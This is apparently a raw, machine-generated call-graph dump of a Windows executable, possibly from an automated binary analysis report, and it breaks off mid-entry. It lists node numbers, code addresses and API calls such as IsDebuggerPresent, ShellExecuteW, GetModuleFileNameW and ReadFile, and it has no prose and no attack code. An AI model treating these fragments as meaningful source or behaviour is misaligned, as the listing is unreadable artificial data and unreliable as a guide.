LeaveCriticalSection 86650->86712 86652 40d748 86653 4119b0 86652->86653 86654 4119d6 86653->86654 86655 4119bc 86653->86655 86654->86571 86655->86654 86747 417f77 46 API calls __getptd_noexit 86655->86747 86657 4119c6 86748 417f25 10 API calls __write_nolock 86657->86748 86659 4119d1 86659->86571 86660->86573 86749 401f20 86661->86749 86663 40d5b6 IsDebuggerPresent 86664 40d5c4 86663->86664 86665 42e1bb MessageBoxA 86663->86665 86666 42e1d4 86664->86666 86667 40d5e3 86664->86667 86665->86666 86921 403a50 52 API calls 3 library calls 86666->86921 86819 40f520 86667->86819 86671 40d5fd GetFullPathNameW 86831 401460 86671->86831 86673 40d63b 86674 40d643 86673->86674 86675 42e231 SetCurrentDirectoryW 86673->86675 86676 40d64c 86674->86676 86922 432fee 6 API calls 86674->86922 86675->86674 86846 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86676->86846 86679 42e252 86679->86676 86681 42e25a GetModuleFileNameW 86679->86681 86683 42e274 86681->86683 86684 42e2cb GetForegroundWindow ShellExecuteW 86681->86684 86923 401b10 86683->86923 86686 40d688 86684->86686 86685 40d656 86688 40d669 86685->86688 86691 40e0c0 74 API calls 86685->86691 86693 40d692 SetCurrentDirectoryW 86686->86693 86854 4091e0 86688->86854 86691->86688 86693->86575 86695 42e28d 86930 40d200 52 API calls 2 library calls 86695->86930 86698 42e299 GetForegroundWindow ShellExecuteW 86699 42e2c6 86698->86699 86699->86686 86700 40ec00 LoadLibraryA GetProcAddress 86700->86566 86702 40d72e 86701->86702 86703 40ebd6 LoadLibraryA 86701->86703 86702->86566 86702->86700 86703->86702 86704 40ebe7 GetProcAddress 86703->86704 86704->86702 86706 4182e0 86705->86706 86707 4182f3 EnterCriticalSection 86705->86707 86713 418209 86706->86713 86707->86650 86709 4182e6 86709->86707 86740 411924 46 API calls 3 library calls 86709->86740 86712->86652 86714 418215 __freefls@4 86713->86714 86715 418225 86714->86715 86717 41823d 86714->86717 86741 418901 46 API calls 2 library calls 86715->86741 86719 416b04 __malloc_crt 45 API calls 86717->86719 86722 41824b __freefls@4 86717->86722 86718 41822a 86742 418752 46 API calls 8 library calls 86718->86742 86721 418256 86719->86721 86724 41825d 86721->86724 86725 41826c 86721->86725 86722->86709 86723 418231 86743 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86723->86743 86744 417f77 46 API calls __getptd_noexit 86724->86744 86726 4182cb __lock 45 API calls 86725->86726 86729 418273 86726->86729 86731 4182a6 86729->86731 86732 41827b InitializeCriticalSectionAndSpinCount 86729->86732 86735 413748 _free 45 API calls 86731->86735 86733 418297 86732->86733 86734 41828b 86732->86734 86746 4182c2 LeaveCriticalSection _doexit 86733->86746 86736 413748 _free 45 API calls 86734->86736 86735->86733 86737 418291 86736->86737 86745 417f77 46 API calls __getptd_noexit 86737->86745 86741->86718 86742->86723 86744->86722 86745->86733 86746->86722 86747->86657 86748->86659 86931 40e6e0 86749->86931 86753 401f41 GetModuleFileNameW 86949 410100 86753->86949 86755 401f5c 86961 410960 86755->86961 86758 401b10 52 API calls 86759 401f81 86758->86759 86964 401980 86759->86964 86761 401f8e 86762 408f40 VariantClear 86761->86762 86763 401f9d 86762->86763 86764 401b10 52 API calls 86763->86764 86765 401fb4 86764->86765 86766 401980 53 API calls 86765->86766 86767 401fc3 86766->86767 86768 401b10 52 API calls 86767->86768 86769 401fd2 86768->86769 86972 40c2c0 86769->86972 86771 401fe1 86772 40bc70 52 API calls 86771->86772 86773 401ff3 86772->86773 86990 401a10 86773->86990 86775 401ffe 86997 4114ab 86775->86997 86778 428b05 86780 401a10 52 API calls 86778->86780 86779 402017 86781 4114ab __wcsicoll 58 API calls 86779->86781 86782 428b18 86780->86782 86783 402022 86781->86783 86785 401a10 52 API calls 86782->86785 86783->86782 86784 40202d 86783->86784 86786 4114ab __wcsicoll 58 API calls 86784->86786 86787 428b33 86785->86787 86788 402038 86786->86788 86790 428b3b GetModuleFileNameW 86787->86790 86789 402043 86788->86789 86788->86790 86791 4114ab __wcsicoll 58 API calls 86789->86791 86792 401a10 52 API calls 86790->86792 86793 40204e 86791->86793 86794 428b6c 86792->86794 86795 402092 86793->86795 86799 401a10 52 API calls 86793->86799 86804 428b90 _wcscpy 86793->86804 87009 40e0a0 52 API calls 86794->87009 86798 4020a3 86795->86798 86795->86804 86797 428b7a 86800 401a10 52 API calls 86797->86800 86801 428bc6 86798->86801 87005 40e830 53 API calls 86798->87005 86802 402073 _wcscpy 86799->86802 86803 428b88 86800->86803 86810 401a10 52 API calls 86802->86810 86803->86804 86807 401a10 52 API calls 86804->86807 86806 4020bb 87006 40cf00 53 API calls 86806->87006 86814 4020d0 86807->86814 86809 4020c6 86811 408f40 VariantClear 86809->86811 86810->86795 86811->86814 86812 402110 86816 408f40 VariantClear 86812->86816 86814->86812 86817 401a10 52 API calls 86814->86817 87007 40cf00 53 API calls 86814->87007 87008 40e6a0 53 API calls 86814->87008 86818 402120 ctype 86816->86818 86817->86814 86818->86663 86820 4295c9 __recalloc 86819->86820 86821 40f53c 86819->86821 86823 4295d9 GetOpenFileNameW 86820->86823 87688 410120 86821->87688 86823->86821 86826 40d5f5 86823->86826 86824 40f545 87692 4102b0 SHGetMalloc 86824->87692 86826->86671 86826->86673 86827 40f54c 87697 410190 GetFullPathNameW 86827->87697 86829 40f559 87708 40f570 86829->87708 87770 402400 86831->87770 86833 40146f 86836 428c29 _wcscat 86833->86836 87779 401500 86833->87779 86835 40147c 86835->86836 87787 40d440 86835->87787 86838 401489 86838->86836 86839 401491 GetFullPathNameW 86838->86839 86840 402160 52 API calls 86839->86840 86841 4014bb 86840->86841 86842 402160 52 API calls 86841->86842 86843 4014c8 86842->86843 86843->86836 86844 402160 52 API calls 86843->86844 86845 4014ee 86844->86845 86845->86673 86847 428361 86846->86847 86848 4103fc LoadImageW RegisterClassExW 86846->86848 87858 44395e EnumResourceNamesW LoadImageW 86847->87858 87857 410490 7 API calls 86848->87857 86851 40d651 86853 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86851->86853 86852 428368 86853->86685 86855 409202 86854->86855 86856 42d7ad 86854->86856 86913 409216 ctype 86855->86913 88121 410940 335 API calls 86855->88121 88124 45e737 90 API calls 3 library calls 86856->88124 86859 409386 86860 40939c 86859->86860 88122 40f190 10 API calls 86859->88122 86860->86686 86920 401000 Shell_NotifyIconW __recalloc 86860->86920 86862 4095b2 86862->86860 86863 4095bf 86862->86863 88123 401a50 335 API calls 86863->88123 86864 409253 PeekMessageW 86864->86913 86866 42d8cd Sleep 86866->86913 86867 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86867->86860 86870 4095f9 86867->86870 86869 42e13b 88143 40d410 VariantClear 86869->88143 86872 42e158 TranslateMessage DispatchMessageW GetMessageW 86870->86872 86872->86872 86875 42e188 86872->86875 86874 409567 PeekMessageW 86874->86913 86875->86860 86878 44c29d 52 API calls 86918 4094e0 86878->86918 86879 46f3c1 107 API calls 86879->86913 86881 46fdbf 108 API calls 86881->86918 86882 409551 TranslateMessage DispatchMessageW 86882->86874 86884 42dcd2 WaitForSingleObject 86885 42dcf0 GetExitCodeProcess CloseHandle 86884->86885 86884->86913 88132 40d410 VariantClear 86885->88132 86887 42dd3d Sleep 86887->86918 86888 47d33e 313 API calls 86888->86913 86891 4094cf Sleep 86891->86918 86893 42d94d timeGetTime 88128 465124 53 API calls 86893->88128 86895 40d410 VariantClear 86895->86913 86896 40c620 timeGetTime 86896->86918 86899 42dd89 CloseHandle 86899->86918 86901 465124 53 API calls 86901->86918 86902 42de19 GetExitCodeProcess CloseHandle 86902->86918 86904 401b10 52 API calls 86904->86918 86907 42de88 Sleep 86907->86913 86909 45e737 90 API calls 86909->86913 86912 42e0cc VariantClear 86912->86913 86913->86859 86913->86864 86913->86866 86913->86869 86913->86874 86913->86879 86913->86882 86913->86884 86913->86887 86913->86888 86913->86891 86913->86893 86913->86895 86913->86909 86913->86912 86914 408f40 VariantClear 86913->86914 86913->86918 87859 4091b0 86913->87859 87917 40afa0 86913->87917 87943 408fc0 86913->87943 87978 408cc0 86913->87978 87992 4096a0 86913->87992 88119 40d150 TranslateAcceleratorW 86913->88119 88120 40d170 IsDialogMessageW GetClassLongW 86913->88120 88125 465124 53 API calls 86913->88125 88126 40e0a0 52 API calls 86913->88126 88127 40c620 timeGetTime 86913->88127 88142 40e270 VariantClear ctype 86913->88142 86914->86913 86916 401980 53 API calls 86916->86918 86918->86878 86918->86881 86918->86896 86918->86899 86918->86901 86918->86902 86918->86904 86918->86907 86918->86913 86918->86916 86919 408f40 VariantClear 86918->86919 88129 45178a 54 API calls 86918->88129 88130 47d33e 335 API calls 86918->88130 88131 453bc6 54 API calls 86918->88131 88133 40d410 VariantClear 86918->88133 88134 443d19 67 API calls _wcslen 86918->88134 88135 4574b4 VariantClear 86918->88135 88136 403cd0 86918->88136 88140 4731e1 VariantClear 86918->88140 88141 4331a2 6 API calls 86918->88141 86919->86918 86920->86686 86921->86673 86922->86679 86924 401b16 _wcslen 86923->86924 86925 4115d7 52 API calls 86924->86925 86926 401b63 86924->86926 86927 401b4b _memmove 86925->86927 86929 40d200 52 API calls 2 library calls 86926->86929 86928 4115d7 52 API calls 86927->86928 86928->86926 86929->86695 86930->86698 86932 40bc70 52 API calls 86931->86932 86933 401f31 86932->86933 86934 402560 86933->86934 86935 40256d __write_nolock 86934->86935 86936 402160 52 API calls 86935->86936 86938 402593 86936->86938 86948 4025bd 86938->86948 87010 401c90 86938->87010 86939 4026f0 52 API calls 86939->86948 86940 4026a7 86941 401b10 52 API calls 86940->86941 86947 4026db 86940->86947 86943 4026d1 86941->86943 86942 401b10 52 API calls 86942->86948 87014 40d7c0 52 API calls 2 library calls 86943->87014 86944 401c90 52 API calls 86944->86948 86947->86753 86948->86939 86948->86940 86948->86942 86948->86944 87013 40d7c0 52 API calls 2 library calls 86948->87013 87015 40f760 86949->87015 86952 410118 86952->86755 86954 42805d 86955 42806a 86954->86955 87071 431e58 86954->87071 86957 413748 _free 46 API calls 86955->86957 86958 428078 86957->86958 86959 431e58 82 API calls 86958->86959 86960 428084 86959->86960 86960->86755 86962 4115d7 52 API calls 86961->86962 86963 401f74 86962->86963 86963->86758 86965 4019a3 86964->86965 86966 401985 86964->86966 86965->86966 86967 4019b8 86965->86967 86968 40199f 86966->86968 87676 403e10 53 API calls 86966->87676 87677 403e10 53 API calls 86967->87677 86968->86761 86971 4019c4 86971->86761 86973 40c2c7 86972->86973 86974 40c30e 86972->86974 86977 40c2d3 86973->86977 86978 426c79 86973->86978 86975 40c315 86974->86975 86976 426c2b 86974->86976 86979 40c321 86975->86979 86980 426c5a 86975->86980 86982 426c4b 86976->86982 86983 426c2e 86976->86983 87678 403ea0 52 API calls __cinit 86977->87678 87683 4534e3 52 API calls 86978->87683 87679 403ea0 52 API calls __cinit 86979->87679 87682 4534e3 52 API calls 86980->87682 87681 4534e3 52 API calls 86982->87681 86989 40c2de 86983->86989 87680 4534e3 52 API calls 86983->87680 86989->86771 86991 401a30 86990->86991 86992 401a17 86990->86992 86994 402160 52 API calls 86991->86994 86993 401a2d 86992->86993 87684 403c30 52 API calls _memmove 86992->87684 86993->86775 86996 401a3d 86994->86996 86996->86775 86998 411523 86997->86998 86999 4114ba 86997->86999 87687 4113a8 58 API calls 4 library calls 86998->87687 87004 40200c 86999->87004 87685 417f77 46 API calls __getptd_noexit 86999->87685 87002 4114c6 87686 417f25 10 API calls __write_nolock 87002->87686 87004->86778 87004->86779 87005->86806 87006->86809 87007->86814 87008->86814 87009->86797 87011 4026f0 52 API calls 87010->87011 87012 401c97 87011->87012 87012->86938 87013->86948 87014->86947 87075 40f6f0 87015->87075 87017 40f77b _strcat ctype 87083 40f850 87017->87083 87022 427c2a 87112 414d04 87022->87112 87024 40f7fc 87024->87022 87025 40f804 87024->87025 87099 414a46 87025->87099 87030 40f80e 87030->86952 87034 4528bd 87030->87034 87031 427c59 87118 414fe2 87031->87118 87033 427c79 87035 4150d1 _fseek 81 API calls 87034->87035 87036 452930 87035->87036 87618 452719 87036->87618 87039 452948 87039->86954 87040 414d04 __fread_nolock 61 API calls 87041 452966 87040->87041 87042 414d04 __fread_nolock 61 API calls 87041->87042 87043 452976 87042->87043 87044 414d04 __fread_nolock 61 API calls 87043->87044 87045 45298f 87044->87045 87046 414d04 __fread_nolock 61 API calls 87045->87046 87047 4529aa 87046->87047 87048 4150d1 _fseek 81 API calls 87047->87048 87049 4529c4 87048->87049 87050 4135bb _malloc 46 API calls 87049->87050 87051 4529cf 87050->87051 87052 4135bb _malloc 46 API calls 87051->87052 87053 4529db 87052->87053 87054 414d04 __fread_nolock 61 API calls 87053->87054 87055 4529ec 87054->87055 87056 44afef GetSystemTimeAsFileTime 87055->87056 87057 452a00 87056->87057 87058 452a36 87057->87058 87059 452a13 87057->87059 87061 452aa5 87058->87061 87062 452a3c 87058->87062 87060 413748 _free 46 API calls 87059->87060 87064 452a1c 87060->87064 87063 413748 _free 46 API calls 87061->87063 87624 44b1a9 87062->87624 87066 452aa3 87063->87066 87067 413748 _free 46 API calls 87064->87067 87066->86954 87069 452a25 87067->87069 87068 452a9d 87070 413748 _free 46 API calls 87068->87070 87069->86954 87070->87066 87072 431e64 87071->87072 87073 431e6a 87071->87073 87074 414a46 __fcloseall 82 API calls 87072->87074 87073->86955 87074->87073 87076 425de2 87075->87076 87077 40f6fc _wcslen 87075->87077 87076->87017 87078 40f710 WideCharToMultiByte 87077->87078 87079 40f756 87078->87079 87080 40f728 87078->87080 87079->87017 87081 4115d7 52 API calls 87080->87081 87082 40f735 WideCharToMultiByte 87081->87082 87082->87017 87085 40f85d __recalloc _strlen 87083->87085 87086 40f7ab 87085->87086 87131 414db8 87085->87131 87087 4149c2 87086->87087 87146 414904 87087->87146 87089 40f7e9 87089->87022 87090 40f5c0 87089->87090 87094 40f5cd _strcat __write_nolock _memmove 87090->87094 87091 414d04 __fread_nolock 61 API calls 87091->87094 87093 425d11 87095 4150d1 _fseek 81 API calls 87093->87095 87094->87091 87094->87093 87098 40f691 __tzset_nolock 87094->87098 87234 4150d1 87094->87234 87096 425d33 87095->87096 87097 414d04 __fread_nolock 61 API calls 87096->87097 87097->87098 87098->87024 87100 414a52 __freefls@4 87099->87100 87101 414a64 87100->87101 87102 414a79 87100->87102 87374 417f77 46 API calls __getptd_noexit 87101->87374 87105 415471 __lock_file 47 API calls 87102->87105 87110 414a74 __freefls@4 87102->87110 87104 414a69 87375 417f25 10 API calls __write_nolock 87104->87375 87107 414a92 87105->87107 87358 4149d9 87107->87358 87110->87030 87443 414c76 87112->87443 87114 414d1c 87115 44afef 87114->87115 87611 442c5a 87115->87611 87117 44b00d 87117->87031 87119 414fee __freefls@4 87118->87119 87120 414ffa 87119->87120 87121 41500f 87119->87121 87615 417f77 46 API calls __getptd_noexit 87120->87615 87123 415471 __lock_file 47 API calls 87121->87123 87125 415017 87123->87125 87124 414fff 87616 417f25 10 API calls __write_nolock 87124->87616 87126 414e4e __ftell_nolock 51 API calls 87125->87126 87128 415024 87126->87128 87617 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87128->87617 87129 41500a __freefls@4 87129->87033 87132 414dd6 87131->87132 87133 414deb 87131->87133 87142 417f77 46 API calls __getptd_noexit 87132->87142 87133->87132 87134 414df2 87133->87134 87144 41b91b 79 API calls 12 library calls 87134->87144 87137 414ddb 87143 417f25 10 API calls __write_nolock 87137->87143 87138 414e18 87140 414de6 87138->87140 87145 418f98 77 API calls 7 library calls 87138->87145 87140->87085 87142->87137 87143->87140 87144->87138 87145->87140 87149 414910 __freefls@4 87146->87149 87147 414923 87202 417f77 46 API calls __getptd_noexit 87147->87202 87149->87147 87151 414951 87149->87151 87150 414928 87203 417f25 10 API calls __write_nolock 87150->87203 87165 41d4d1 87151->87165 87154 414956 87155 41496a 87154->87155 87156 41495d 87154->87156 87158 414992 87155->87158 87159 414972 87155->87159 87204 417f77 46 API calls __getptd_noexit 87156->87204 87182 41d218 87158->87182 87205 417f77 46 API calls __getptd_noexit 87159->87205 87162 414933 @_EH4_CallFilterFunc@8 __freefls@4 87162->87089 87166 41d4dd __freefls@4 87165->87166 87167 4182cb __lock 46 API calls 87166->87167 87168 41d4eb 87167->87168 87169 41d567 87168->87169 87178 418209 __mtinitlocknum 46 API calls 87168->87178 87180 41d560 87168->87180 87210 4154b2 47 API calls __lock 87168->87210 87211 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87168->87211 87171 416b04 __malloc_crt 46 API calls 87169->87171 87173 41d56e 87171->87173 87172 41d5f0 __freefls@4 87172->87154 87174 41d57c InitializeCriticalSectionAndSpinCount 87173->87174 87173->87180 87176 41d59c 87174->87176 87177 41d5af EnterCriticalSection 87174->87177 87179 413748 _free 46 API calls 87176->87179 87177->87180 87178->87168 87179->87180 87207 41d5fb 87180->87207 87183 41d23a 87182->87183 87184 41d255 87183->87184 87196 41d26c __wopenfile 87183->87196 87216 417f77 46 API calls __getptd_noexit 87184->87216 87185 41d421 87188 41d47a 87185->87188 87189 41d48c 87185->87189 87187 41d25a 87217 417f25 10 API calls __write_nolock 87187->87217 87221 417f77 46 API calls __getptd_noexit 87188->87221 87213 422bf9 87189->87213 87193 41d47f 87222 417f25 10 API calls __write_nolock 87193->87222 87194 41499d 87206 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87194->87206 87196->87185 87196->87188 87218 41341f 58 API calls 3 library calls 87196->87218 87198 41d41a 87198->87185 87219 41341f 58 API calls 3 library calls 87198->87219 87200 41d439 87200->87185 87220 41341f 58 API calls 3 library calls 87200->87220 87202->87150 87203->87162 87204->87162 87205->87162 87206->87162 87212 4181f2 LeaveCriticalSection 87207->87212 87209 41d602 87209->87172 87210->87168 87211->87168 87212->87209 87223 422b35 87213->87223 87215 422c14 87215->87194 87216->87187 87217->87194 87218->87198 87219->87200 87220->87185 87221->87193 87222->87194 87224 422b41 __freefls@4 87223->87224 87225 422b54 87224->87225 87228 422b8a 87224->87228 87226 417f77 __recalloc 46 API calls 87225->87226 87227 422b59 87226->87227 87229 417f25 __write_nolock 10 API calls 87227->87229 87230 422400 __tsopen_nolock 109 API calls 87228->87230 87233 422b63 __freefls@4 87229->87233 87231 422ba4 87230->87231 87232 422bcb __wsopen_helper LeaveCriticalSection 87231->87232 87232->87233 87233->87215 87237 4150dd __freefls@4 87234->87237 87235 4150e9 87265 417f77 46 API calls __getptd_noexit 87235->87265 87237->87235 87238 41510f 87237->87238 87247 415471 87238->87247 87239 4150ee 87266 417f25 10 API calls __write_nolock 87239->87266 87246 4150f9 __freefls@4 87246->87094 87248 415483 87247->87248 87249 4154a5 EnterCriticalSection 87247->87249 87248->87249 87250 41548b 87248->87250 87252 415117 87249->87252 87251 4182cb __lock 46 API calls 87250->87251 87251->87252 87253 415047 87252->87253 87254 415067 87253->87254 87255 415057 87253->87255 87260 415079 87254->87260 87268 414e4e 87254->87268 87323 417f77 46 API calls __getptd_noexit 87255->87323 87259 41505c 87267 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87259->87267 87285 41443c 87260->87285 87263 4150b9 87298 41e1f4 87263->87298 87265->87239 87266->87246 87267->87246 87269 414e61 87268->87269 87270 414e79 87268->87270 87324 417f77 46 API calls __getptd_noexit 87269->87324 87272 414139 __fputwc_nolock 46 API calls 87270->87272 87274 414e80 87272->87274 87273 414e66 87325 417f25 10 API calls __write_nolock 87273->87325 87276 41e1f4 __write 51 API calls 87274->87276 87277 414e97 87276->87277 87278 414f09 87277->87278 87280 414ec9 87277->87280 87284 414e71 87277->87284 87326 417f77 46 API calls __getptd_noexit 87278->87326 87281 41e1f4 __write 51 API calls 87280->87281 87280->87284 87282 414f64 87281->87282 87283 41e1f4 __write 51 API calls 87282->87283 87282->87284 87283->87284 87284->87260 87286 414455 87285->87286 87287 414477 87285->87287 87286->87287 87288 414139 __fputwc_nolock 46 API calls 87286->87288 87291 414139 87287->87291 87289 414470 87288->87289 87327 41b7b2 77 API calls 5 library calls 87289->87327 87292 414145 87291->87292 87293 41415a 87291->87293 87328 417f77 46 API calls __getptd_noexit 87292->87328 87293->87263 87295 41414a 87329 417f25 10 API calls __write_nolock 87295->87329 87297 414155 87297->87263 87299 41e200 __freefls@4 87298->87299 87300 41e223 87299->87300 87301 41e208 87299->87301 87303 41e22f 87300->87303 87308 41e269 87300->87308 87350 417f8a 46 API calls __getptd_noexit 87301->87350 87352 417f8a 46 API calls __getptd_noexit 87303->87352 87304 41e20d 87351 417f77 46 API calls __getptd_noexit 87304->87351 87307 41e234 87353 417f77 46 API calls __getptd_noexit 87307->87353 87330 41ae56 87308->87330 87311 41e26f 87313 41e291 87311->87313 87314 41e27d 87311->87314 87312 41e23c 87354 417f25 10 API calls __write_nolock 87312->87354 87355 417f77 46 API calls __getptd_noexit 87313->87355 87340 41e17f 87314->87340 87318 41e215 __freefls@4 87318->87259 87319 41e289 87357 41e2c0 LeaveCriticalSection __unlock_fhandle 87319->87357 87320 41e296 87356 417f8a 46 API calls __getptd_noexit 87320->87356 87323->87259 87324->87273 87325->87284 87326->87284 87327->87287 87328->87295 87329->87297 87331 41ae62 __freefls@4 87330->87331 87332 41aebc 87331->87332 87335 4182cb __lock 46 API calls 87331->87335 87333 41aec1 EnterCriticalSection 87332->87333 87334 41aede __freefls@4 87332->87334 87333->87334 87334->87311 87336 41ae8e 87335->87336 87337 41aeaa 87336->87337 87338 41ae97 InitializeCriticalSectionAndSpinCount 87336->87338 87339 41aeec ___lock_fhandle LeaveCriticalSection 87337->87339 87338->87337 87339->87332 87341 41aded __chsize_nolock 46 API calls 87340->87341 87342 41e18e 87341->87342 87343 41e1a4 SetFilePointer 87342->87343 87344 41e194 87342->87344 87345 41e1bb GetLastError 87343->87345 87347 41e1c3 87343->87347 87346 417f77 __recalloc 46 API calls 87344->87346 87345->87347 87348 41e199 87346->87348 87347->87348 87349 417f9d __dosmaperr 46 API calls 87347->87349 87348->87319 87349->87348 87350->87304 87351->87318 87352->87307 87353->87312 87354->87318 87355->87320 87356->87319 87357->87318 87359 4149ea 87358->87359 87360 4149fe 87358->87360 87404 417f77 46 API calls __getptd_noexit 87359->87404 87363 4149fa 87360->87363 87364 41443c __flush 77 API calls 87360->87364 87362 4149ef 87405 417f25 10 API calls __write_nolock 87362->87405 87376 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87363->87376 87366 414a0a 87364->87366 87377 41d8c2 87366->87377 87369 414139 __fputwc_nolock 46 API calls 87370 414a18 87369->87370 87381 41d7fe 87370->87381 87372 414a1e 87372->87363 87373 413748 _free 46 API calls 87372->87373 87373->87363 87374->87104 87375->87110 87376->87110 87378 41d8d2 87377->87378 87380 414a12 87377->87380 87379 413748 _free 46 API calls 87378->87379 87378->87380 87379->87380 87380->87369 87382 41d80a __freefls@4 87381->87382 87383 41d812 87382->87383 87384 41d82d 87382->87384 87421 417f8a 46 API calls __getptd_noexit 87383->87421 87385 41d839 87384->87385 87390 41d873 87384->87390 87423 417f8a 46 API calls __getptd_noexit 87385->87423 87388 41d817 87422 417f77 46 API calls __getptd_noexit 87388->87422 87389 41d83e 87424 417f77 46 API calls __getptd_noexit 87389->87424 87393 41ae56 ___lock_fhandle 48 API calls 87390->87393 87395 41d879 87393->87395 87394 41d846 87425 417f25 10 API calls __write_nolock 87394->87425 87397 41d893 87395->87397 87398 41d887 87395->87398 87426 417f77 46 API calls __getptd_noexit 87397->87426 87406 41d762 87398->87406 87401 41d81f __freefls@4 87401->87372 87402 41d88d 87427 41d8ba LeaveCriticalSection __unlock_fhandle 87402->87427 87404->87362 87405->87363 87428 41aded 87406->87428 87408 41d7c8 87441 41ad67 47 API calls 2 library calls 87408->87441 87409 41d772 87409->87408 87411 41aded __chsize_nolock 46 API calls 87409->87411 87420 41d7a6 87409->87420 87414 41d79d 87411->87414 87412 41aded __chsize_nolock 46 API calls 87415 41d7b2 CloseHandle 87412->87415 87413 41d7d0 87416 41d7f2 87413->87416 87442 417f9d 46 API calls 3 library calls 87413->87442 87417 41aded __chsize_nolock 46 API calls 87414->87417 87415->87408 87418 41d7be GetLastError 87415->87418 87416->87402 87417->87420 87418->87408 87420->87408 87420->87412 87421->87388 87422->87401 87423->87389 87424->87394 87425->87401 87426->87402 87427->87401 87429 41ae12 87428->87429 87430 41adfa 87428->87430 87433 417f8a __write_nolock 46 API calls 87429->87433 87436 41ae51 87429->87436 87431 417f8a __write_nolock 46 API calls 87430->87431 87432 41adff 87431->87432 87434 417f77 __recalloc 46 API calls 87432->87434 87435 41ae23 87433->87435 87437 41ae07 87434->87437 87438 417f77 __recalloc 46 API calls 87435->87438 87436->87409 87437->87409 87439 41ae2b 87438->87439 87440 417f25 __write_nolock 10 API calls 87439->87440 87440->87437 87441->87413 87442->87416 87444 414c82 __freefls@4 87443->87444 87445 414cc3 87444->87445 87446 414c96 __recalloc 87444->87446 87447 414cbb __freefls@4 87444->87447 87448 415471 __lock_file 47 API calls 87445->87448 87470 417f77 46 API calls __getptd_noexit 87446->87470 87447->87114 87450 414ccb 87448->87450 87456 414aba 87450->87456 87451 414cb0 87471 417f25 10 API calls __write_nolock 87451->87471 87457 414af2 87456->87457 87460 414ad8 __recalloc 87456->87460 87472 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87457->87472 87458 414ae2 87523 417f77 46 API calls __getptd_noexit 87458->87523 87460->87457 87460->87458 87463 414b2d 87460->87463 87463->87457 87464 414139 __fputwc_nolock 46 API calls 87463->87464 87467 414c38 __recalloc 87463->87467 87473 41dfcc 87463->87473 87503 41d8f3 87463->87503 87525 41e0c2 46 API calls 3 library calls 87463->87525 87464->87463 87526 417f77 46 API calls __getptd_noexit 87467->87526 87469 414ae7 87524 417f25 10 API calls __write_nolock 87469->87524 87470->87451 87471->87447 87472->87447 87474 41dfd8 __freefls@4 87473->87474 87475 41dfe0 87474->87475 87476 41dffb 87474->87476 87596 417f8a 46 API calls __getptd_noexit 87475->87596 87477 41e007 87476->87477 87482 41e041 87476->87482 87598 417f8a 46 API calls __getptd_noexit 87477->87598 87480 41dfe5 87597 417f77 46 API calls __getptd_noexit 87480->87597 87481 41e00c 87599 417f77 46 API calls __getptd_noexit 87481->87599 87485 41e063 87482->87485 87486 41e04e 87482->87486 87487 41ae56 ___lock_fhandle 48 API calls 87485->87487 87601 417f8a 46 API calls __getptd_noexit 87486->87601 87490 41e069 87487->87490 87488 41e014 87600 417f25 10 API calls __write_nolock 87488->87600 87493 41e077 87490->87493 87494 41e08b 87490->87494 87491 41e053 87602 417f77 46 API calls __getptd_noexit 87491->87602 87492 41dfed __freefls@4 87492->87463 87527 41da15 87493->87527 87603 417f77 46 API calls __getptd_noexit 87494->87603 87499 41e083 87605 41e0ba LeaveCriticalSection __unlock_fhandle 87499->87605 87500 41e090 87604 417f8a 46 API calls __getptd_noexit 87500->87604 87504 41d900 87503->87504 87508 41d915 87503->87508 87609 417f77 46 API calls __getptd_noexit 87504->87609 87506 41d905 87610 417f25 10 API calls __write_nolock 87506->87610 87509 41d94a 87508->87509 87515 41d910 87508->87515 87606 420603 87508->87606 87511 414139 __fputwc_nolock 46 API calls 87509->87511 87512 41d95e 87511->87512 87513 41dfcc __read 59 API calls 87512->87513 87514 41d965 87513->87514 87514->87515 87516 414139 __fputwc_nolock 46 API calls 87514->87516 87515->87463 87517 41d988 87516->87517 87517->87515 87518 414139 __fputwc_nolock 46 API calls 87517->87518 87519 41d994 87518->87519 87519->87515 87520 414139 __fputwc_nolock 46 API calls 87519->87520 87521 41d9a1 87520->87521 87522 414139 __fputwc_nolock 46 API calls 87521->87522 87522->87515 87523->87469 87524->87457 87525->87463 87526->87469 87528 41da31 87527->87528 87529 41da4c 87527->87529 87530 417f8a __write_nolock 46 API calls 87528->87530 87531 41da5b 87529->87531 87533 41da7a 87529->87533 87532 41da36 87530->87532 87534 417f8a __write_nolock 46 API calls 87531->87534 87536 417f77 __recalloc 46 API calls 87532->87536 87535 41da98 87533->87535 87550 41daac 87533->87550 87537 41da60 87534->87537 87538 417f8a __write_nolock 46 API calls 87535->87538 87547 41da3e 87536->87547 87540 417f77 __recalloc 46 API calls 87537->87540 87542 41da9d 87538->87542 87539 41db02 87541 417f8a __write_nolock 46 API calls 87539->87541 87543 41da67 87540->87543 87545 41db07 87541->87545 87546 417f77 __recalloc 46 API calls 87542->87546 87544 417f25 __write_nolock 10 API calls 87543->87544 87544->87547 87548 417f77 __recalloc 46 API calls 87545->87548 87549 41daa4 87546->87549 87547->87499 87548->87549 87553 417f25 __write_nolock 10 API calls 87549->87553 87550->87539 87550->87547 87551 41dae1 87550->87551 87552 41db1b 87550->87552 87551->87539 87558 41daec ReadFile 87551->87558 87555 416b04 __malloc_crt 46 API calls 87552->87555 87553->87547 87559 41db31 87555->87559 87556 41dc17 87557 41df8f GetLastError 87556->87557 87565 41dc2b 87556->87565 87560 41de16 87557->87560 87561 41df9c 87557->87561 87558->87556 87558->87557 87562 41db59 87559->87562 87563 41db3b 87559->87563 87569 417f9d __dosmaperr 46 API calls 87560->87569 87575 41dd9b 87560->87575 87567 417f77 __recalloc 46 API calls 87561->87567 87566 420494 __lseeki64_nolock 48 API calls 87562->87566 87564 417f77 __recalloc 46 API calls 87563->87564 87568 41db40 87564->87568 87565->87575 87576 41dc47 87565->87576 87579 41de5b 87565->87579 87570 41db67 87566->87570 87571 41dfa1 87567->87571 87573 417f8a __write_nolock 46 API calls 87568->87573 87569->87575 87570->87558 87572 417f8a __write_nolock 46 API calls 87571->87572 87572->87575 87573->87547 87574 413748 _free 46 API calls 87574->87547 87575->87547 87575->87574 87577 41dcab ReadFile 87576->87577 87586 